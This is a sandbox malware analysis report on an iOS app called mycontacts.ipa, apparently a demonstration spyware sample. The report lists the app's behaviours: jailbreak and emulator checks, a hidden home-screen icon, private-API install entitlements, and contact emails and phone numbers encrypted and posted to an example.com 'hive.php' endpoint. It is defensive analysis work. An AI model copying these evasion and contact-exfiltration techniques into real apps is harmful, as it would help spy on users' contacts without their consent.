Loading ...

Play interactive tourEdit tour

Analysis Report mycontacts.ipa

Overview

General Information

Sample Name:mycontacts.ipa
Analysis ID:129790
MD5:e0e7ea33957b0b0c30f13df4ec017937
SHA1:430d7f9c9865dac1f56b9bb5e9ea8700d83409fa
SHA256:ceeafc96b3bbd7a20749919a86b407863f9fedc83aaafa16e8d2b16c274dea8f
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false

Signatures

Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)
Contains functionality to determine if device is jailbroken
Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)
Has the permission to install, browse, and/or archive apps (using a private API)
Has the permission to launch other apps (using a private API)
Has the permission to uninstall and/or remove apps from the archive (using a private API)
Hides its icon from the SpringBoard
Sends email addresses over the network
Sends potentially phone numbers over the network
Contains functionality to query for schemes
Contains string references indicative for jailbreak checks
Contains string references to suspicious strings
Encrypts data that contains email addresses
Encrypts data that potentially contains phone numbers
Encrypts data using the common crypto API
Has permission to query schemes that could be used for querying installed apps
IP address seen in connection with other malware
May request permission to access the camera
May request permission to access the contacts database
May request permission to access the photo library
May request permission to use the microphone
Reads the systems OS release and/or type

Classification

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)CCCrypt: email addresses in plaintext detectedJump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)CCCrypt: phone number strings in plaintext detectedJump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)CCCrypt: operation encryptionJump to behavior

Networking:

barindex
Sends email addresses over the networkShow sources
Source: global trafficHTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Sends potentially phone numbers over the networkShow sources
Source: global trafficHTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: www.example.com
Source: unknownHTTP traffic detected: POST /hive.php HTTP/1.1Host: www.example.comContent-Type: application/jsonConnection: keep-aliveAccept: */*User-Agent: mycontacts/1 CFNetwork/1121.2.2 Darwin/19.3.0Content-Length: 1158Accept-Language: en-usAccept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 07 Apr 2021 08:10:40 GMTExpires: Wed, 14 Apr 2021 08:10:40 GMTServer: EOS (vny/044E)Content-Length: 445Connection: close
Source: mycontactsString found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: embedded.mobileprovisionString found in binary or memory: http://crl.apple.com/iphone.crl0
Source: mycontactsString found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3030
Source: CodeResourcesString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: embedded.mobileprovisionString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: embedded.mobileprovisionString found in binary or memory: https://www.apple.com/appleca/0
Source: mycontactsString found in binary or memory: https://www.apple.com/certificateauthority/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60916
Source: unknownNetwork traffic detected: HTTP traffic on port 60916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60917 -> 443
Source: IPA file Info.plistNSCameraUsageDescription: This app requires access to your camera in order to perform video calls.
Source: IPA file Info.plistNSMicrophoneUsageDescription: This app requires access to your microphone in order to perform phone calls.
Source: IPA file Info.plistLSApplicationQueriesSchemes: sinaweibo, weixin, cydia, sileo, zbra
Source: classification engineClassification label: mal76.spyw.evad.iosIPA@0/0@2/2
Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729cStatic ARM disassembly: 0x1000072ac ldr x1, #0x705c (metainfo: Objc selector ref: doSimpleJailbreakChecks)f_10000729c
Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729cStatic ARM disassembly: 0x1000072b0 bl 0x100008e70 (metainfo: Objc message: -[x0 doSimpleJailbreakChecks])f_10000729c
Source: Initial sample, func: -[ViewController sendContacts] @ 0x1000082c0Static ARM disassembly: 0x1000087cc adr x2, #0x3e8c (metainfo: Objc cfstring ref: @"https://www.example.com/hive.php")f_1000082c0

Persistence and Installation Behavior:

barindex
Has the permission to install, browse, and/or archive apps (using a private API)Show sources
Source: Initial sampleEmbedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Install', 'Browse', and/or 'Archive'
Has the permission to launch other apps (using a private API)Show sources
Source: Initial sampleEmbedded entitlements.plist: Entitlement com.apple.springboard.launchapplications is true
Has the permission to uninstall and/or remove apps from the archive (using a private API)Show sources
Source: Initial sampleEmbedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Uninstall', and/or 'RemoveArchive'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides its icon from the SpringBoardShow sources
Source: Initial sampleInfo.plist: SBAppTags contains 'hidden' element

Malware Analysis System Evasion:

barindex
Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)Show sources
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)Sysctl read request: sysctl.proc_nativeJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)Show sources
Source: Initial sampleEmbedded.mobileprovision: ProvisionsAllDevices is true

Language, Device and Operating System Detection:

barindex
Contains functionality to determine if device is jailbrokenShow sources
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10Static ARM disassembly, keywords found: selref fileExistsAtPath:, cfcstring /Applications/Cydia.appf_100007f10
Source: Initial sample, func: -[ViewController tableView:didSelectRowAtIndexPath:] @ 0x100007350Static ARM disassembly, keywords found: selref canOpenURLf_100007350
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10Static ARM disassembly, keywords found: selref canOpenURLf_100007f10
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10Static ARM disassembly, keywords found: /var/lib/cydia, /etc/apt, /private/var/lib/apt, /private/var/Users/, /var/log/apt, /Applications/Cydia.app, /private/var/stash, /private/var/lib/apt/, /private/var/lib/cydia, /private/var/cache/apt/, /private/var/log/syslogf_100007f10
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)Sysctl requested: kern.ostypeJump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)Sysctl requested: kern.osreleaseJump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)Sysctl requested: kern.osreleaseJump to behavior

Stealing of Sensitive Information:

barindex
Sends email addresses over the networkShow sources
Source: global trafficHTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Sends potentially phone numbers over the networkShow sources
Source: global trafficHTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)CCCrypt: email addresses in plaintext detectedJump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)CCCrypt: phone number strings in plaintext detectedJump to behavior
Source: IPA file Info.plistNSContactsUsageDescription: This app requires access to your contacts in order to list your contacts.
Source: IPA file Info.plistNSPhotoLibraryUsageDescription: This app requires access to your photo library in order to function properly.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionApplication Discovery1OS Credential DumpingApplication Discovery1Remote ServicesAccess Contact List3Data Encrypted3Encrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsEvade Analysis Environment1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolCapture Audio1Standard Application Layer Protocol2Standard Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerEvade Analysis Environment1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelCapture Camera1Scheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsApplication Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.example.com
93.184.216.34
truefalse
    high
    api.apple-cloudkit.fe.apple-dns.net
    17.248.145.147
    truefalse
      unknown
      api.apple-cloudkit.com
      unknown
      unknownfalse
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://www.example.com/hive.phpfalse
          high

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          93.184.216.34
          www.example.comEuropean Union
          15133EDGECASTUSfalse
          17.248.145.147
          api.apple-cloudkit.fe.apple-dns.netUnited States
          714APPLE-ENGINEERINGUSfalse

          General Information

          Joe Sandbox Version:32.0.0 Black Diamond
          Analysis ID:129790
          Start date:07.04.2021
          Start time:10:09:52
          Joe Sandbox Product:Cloud
          Overall analysis duration:0h 2m 33s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:mycontacts.ipa
          Cookbook file name:defaultiosinteractivecookbook.jbs
          Analysis system description:IPhone 7, iOS 13.3.1
          Analysis Mode:default
          Detection:MAL
          Classification:mal76.spyw.evad.iosIPA@0/0@2/2
          Warnings:
          Show All
          • Excluded IPs from analysis (whitelisted): 2.17.122.218, 2.17.123.152, 2.17.123.154, 2.17.122.209, 2.17.122.217, 2.17.122.224, 2.17.122.219, 2.17.123.176, 2.17.123.168
          • Excluded domains from analysis (whitelisted): iphone-ld.apple.com, iphone-ld.origin-apple.com.akadns.net, a1931.dscgi3.akamai.net, iphone-ld.apple.com-v1.edgesuite.net

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.